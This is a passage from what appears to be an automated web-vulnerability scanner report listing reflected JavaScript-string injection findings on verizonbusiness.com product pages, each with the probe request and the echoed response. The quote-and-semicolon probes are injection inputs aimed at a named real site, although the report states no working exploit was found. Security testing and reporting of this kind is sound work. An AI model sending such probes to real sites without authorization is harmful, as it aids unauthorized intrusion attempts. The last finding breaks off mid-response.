Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking88f1e';eb3918f56c5/internet/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.235. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/internet/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 361a8'%3bc8c470b71d7 was submitted in the REST URL parameter 3. This input was echoed as 361a8';c8c470b71d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/internet361a8'%3bc8c470b71d7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43214
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/internet361a8';c8c470b71d7/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.236. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/internet/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36d38"%3b3ed89cff44e was submitted in the REST URL parameter 3. This input was echoed as 36d38";3ed89cff44e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/internet36d38"%3b3ed89cff44e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/internet36d38";3ed89cff44e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.237. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1987d'%3b52bd6c80198 was submitted in the REST URL parameter 1. This input was echoed as 1987d';52bd6c80198 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products1987d'%3b52bd6c80198/networking/managed HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:02 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products1987d';52bd6c80198/networking/managed'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.238. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9581f"%3b51c8487271 was submitted in the REST URL parameter 1. This input was echoed as 9581f";51c8487271 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products9581f"%3b51c8487271/networking/managed HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:51 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products9581f";51c8487271/networking/managed";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.239. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7935"%3b2b00390ac05 was submitted in the REST URL parameter 2. This input was echoed as f7935";2b00390ac05 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingf7935"%3b2b00390ac05/managed HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networkingf7935";2b00390ac05/managed";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTI
...[SNIP]...

1.240. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7a7b'%3b472d1722e77 was submitted in the REST URL parameter 2. This input was echoed as b7a7b';472d1722e77 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingb7a7b'%3b472d1722e77/managed HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networkingb7a7b';472d1722e77/managed'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.241. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63993"%3b7dc5d26df90 was submitted in the REST URL parameter 3. This input was echoed as 63993";7dc5d26df90 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/managed63993"%3b7dc5d26df90 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:45:39 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43190
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/managed63993";7dc5d26df90";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.242. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51faf'%3b743859d0131 was submitted in the REST URL parameter 3. This input was echoed as 51faf';743859d0131 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/managed51faf'%3b743859d0131 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43190
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/managed51faf';743859d0131'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.243. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9887"%3b1caa27de616 was submitted in the REST URL parameter 1. This input was echoed as d9887";1caa27de616 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsd9887"%3b1caa27de616/networking/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:42 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsd9887";1caa27de616/networking/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.244. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0ae0'%3b13bdef133f1 was submitted in the REST URL parameter 1. This input was echoed as e0ae0';13bdef133f1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productse0ae0'%3b13bdef133f1/networking/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:59 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productse0ae0';13bdef133f1/networking/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.245. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e067'%3bda09bfe68dd was submitted in the REST URL parameter 2. This input was echoed as 6e067';da09bfe68dd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking6e067'%3bda09bfe68dd/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking6e067';da09bfe68dd/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.246. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8085a"%3b9a4165e21d9 was submitted in the REST URL parameter 2. This input was echoed as 8085a";9a4165e21d9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking8085a"%3b9a4165e21d9/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking8085a";9a4165e21d9/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.247. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d14b0"%3b44351732e11 was submitted in the REST URL parameter 3. This input was echoed as d14b0";44351732e11 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/managedd14b0"%3b44351732e11/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:46:06 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
